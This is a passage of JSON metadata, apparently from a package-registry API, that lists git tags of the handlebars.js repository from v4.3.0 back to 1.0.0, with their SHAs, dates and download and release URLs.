ag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"fff3e40402c9f9cd790984560658646a26e1c930","kind":"tag","published_at":"2019-09-20T17:40:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"164c7ceea4ce074f70f2fefeba81e2e551757ea6","kind":"tag","published_at":"2019-09-03T19:58:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0/manifests"},{"name":"v4.1.2-0","sha":"f98c6a54256fec0b36ae1adc4c36ab5412ca3b88","kind":"tag","published_at":"2019-08-25T16:06:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2-0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0/manifests"},{"name":"v3.0.7","sha":"55e4d9d80d5dd834fcf53c528e7e0aa080f315a5","kind":"tag","published_at":"2019-06-30T08:53:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7/manifests"},{"name":"v4.0.14","sha":"272362e44c66d0110a4c98c7c1d121971ce447a7","kind":"tag","published_at":"2019-04-13T14:39:19.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.14","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14/manifests"},{"name":"v4.1.2","sha":"10b5fcf92e6f3ddcbcec93c05c00cfdbb2e8d303","kind":"tag","published_at":"2019-04-13T14:19:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"f691db546e7563e1db3437d5a72f478f9e556714","kind":"tag","published_at":"2019-03-16T21:28:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1/manifests"},{"name":"v4.0.13","sha":"9d4fff19d438a390b4e34d0a175b2de5f196cea8","kind":"tag","published_at":"2019-02-07T10:26:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13/manifests"},{"name":"v4.1.0","sha":"7caca944b1ae64b5bc11cba67d21e4b51ba6196a","kind":"tag","published_at":"2019-02-07T09:46:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0/manifests"},{"name":"v4.0.13-beta.0","sha":"616f8c6fdb8b4224e5ab742e0ae400cfbc74086f","kind":"tag","published_at":"2019-02-02T20:26:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-beta.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0/manifests"},{"name":"v4.0.13-0","sha":"0e56659f7bc9d5060bf791d58fd57c5f9a82ae17","kind":"tag","published_at":"2019-02-02T20:25:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0/manifests"},{"name":"v3.0.6","sha":"5a427d2d2b7264a83ca6702fddf63a6c7ba281c4","kind":"tag","published_at":"2019-01-02T09:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"64254b604b9d7fdf76d40b9c6675326eb4bda42b","kind":"tag","published_at":"2018-12-15T13:16:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"698c8a93a4066937977503d338bcd3b90d5035ca","kind":"tag","published_at":"2018-12-15T12:55:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4/manifests"},{"name":"v4.0.12","sha":"8d22e6f501dc0720fe0610bb4dab60cae18e7d20","kind":"tag","published_at":"2018-09-04T18:44:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12/manifests"},{"name":"v4.0.11","sha":"1e954ddf3c3ec6d2318e1fadc5e03aaf065b2fbd","kind":"tag","published_at":"2017-10-17T20:52:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11/manifests"},{"name":"v4.0.10","sha":"670ec6fafbf99986a70074a37f73d41bad60b083","kind":"tag","published_at":"2017-05-21T12:11:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10/manifests"},{"name":"v4.0.9","sha":"5ec78a8c70ac674f39a8408e04d59bd40340f6fe","kind":"tag","published_at":"2017-05-21T11:39:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9/manifests"},{"name":"v4.0.8","sha":"fed5818876ec325b2b48a61395fe0089bdda05e8","kind":"commit","published_at":"2017-05-02T20:55:44.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8/manifests"},{"name":"v4.0.7","sha":"606fa55b0a2fab4b22b810a21fc9ae1fd5fd8430","kind":"tag","published_at":"2017-04-29T20:52:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7/manifests"},{"name":"tmp-1252-backup","sha":"ee913e28bd34dc6e97f98a99f00b484195f72d6f","kind":"commit","published_at":"2017-01-02T09:13:49.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/tmp-1252-backup","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/tmp-1252-backup","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup/manifests"},{"name":"v4.0.6","sha":"ad3037cf54132fc5f589134d3bef961a5f751973","kind":"commit","published_at":"2016-11-12T18:32:45.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6/manifests"},{"name":"v4.0.5","sha":"205c61cfb1acdb599bbdfcf2d356641254e09e5c","kind":"tag","published_at":"2015-11-20T05:06:54.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5/manifests"},{"name":"v4.0.4","sha":"b7c95e9feb9b641af2fe83b23c3341ec624aae80","kind":"tag","published_at":"2015-10-29T06:54:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"9365b8290070f34bf797c836aed4335ce6a4094f","kind":"tag","published_at":"2015-09-24T03:41:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"a5a3ab01d3659b996234e3fa5a4a32350a145096","kind":"tag","published_at":"2015-09-04T14:13:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"c7b28a65dab1f1bb370f258fd65796d74c7b53cb","kind":"tag","published_at":"2015-09-03T02:21:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"bff5fab8f9d42e21950be00dcf1cedf4dc1a565b","kind":"tag","published_at":"2015-09-01T13:19:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0/manifests"},{"name":"v3.0.3","sha":"891f48b7e9c321dd9cbe7a898533eb6b2434b8a0","kind":"tag","published_at":"2015-04-28T19:52:04.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"2f0b86665f6080c065d67182ccfdca2ce6f243fa","kind":"tag","published_at":"2015-04-20T08:11:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2/manifests"},{"name":"v3.0.1","sha":"afe730e0594440dd17fdc43271fc4a7db19327f3","kind":"tag","published_at":"2015-03-24T19:22:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1/manifests"},{"name":"v3.0.0","sha":"0099e16a01bae4789c3560e2a658fdd7fecc9e12","kind":"tag","published_at":"2015-02-10T06:14:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0/manifests"},{"name":"v2.0.0","sha":"1eb2b04aa1468059172af16968e28ba3a9c07e6d","kind":"tag","published_at":"2014-09-02T02:28:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta.1","sha":"cee52ea68f85baf6812cbc6d303595a88b4ea4f8","kind":"tag","published_at":"2014-08-26T23:32:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1/manifests"},{"name":"v2.0.0-alpha.4","sha":"efad61b1b72a487c087f57ba85287f5682e57280","kind":"tag","published_at":"2014-05-20T04:15:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4/manifests"},{"name":"v2.0.0-alpha.3","sha":"f419838362ad6f3a6f10179bcd7ca683d527e030","kind":"tag","published_at":"2014-05-20T03:29:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3/manifests"},{"name":"v2.0.0-alpha.2","sha":"04c312649b0b9c61a245c4928f230935e9b8dd23","kind":"tag","published_at":"2014-03-06T07:26:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2/manifests"},{"name":"v2.0.0-alpha.1","sha":"a5ff1f3d22178b3889983be29b31b850a4528719","kind":"tag","published_at":"2014-02-19T23:49:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1/manifests"},{"name":"v1.3.0","sha":"0c6829f8af189622afd726bb72c195b5323bd6f9","kind":"tag","published_at":"2014-01-02T04:10:31.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"1c0614bd88b835b7cdfe1fb7f39650c18f645763","kind":"tag","published_at":"2013-12-26T22:25:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"096b8ccd2e376d621fd281e08d557a4632188aaa","kind":"tag","published_at":"2013-12-24T03:39:46.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0/manifests"},{"name":"v1.1.2","sha":"47d13cb23c968ada3878b8bacf2813fb01758475","kind":"tag","published_at":"2013-11-06T00:10:06.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"09cdc19a21cd15059f1982f533bc65e2daae904d","kind":"tag","published_at":"2013-11-04T16:48:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"c53e95414f4e74bf6dfb2379a6b9b2468b8fcb31","kind":"tag","published_at":"2013-11-04T05:00:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0/manifests"},{"name":"1.0.0","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0/manifests"},{"name":"v1.0.12","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:16:53.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/h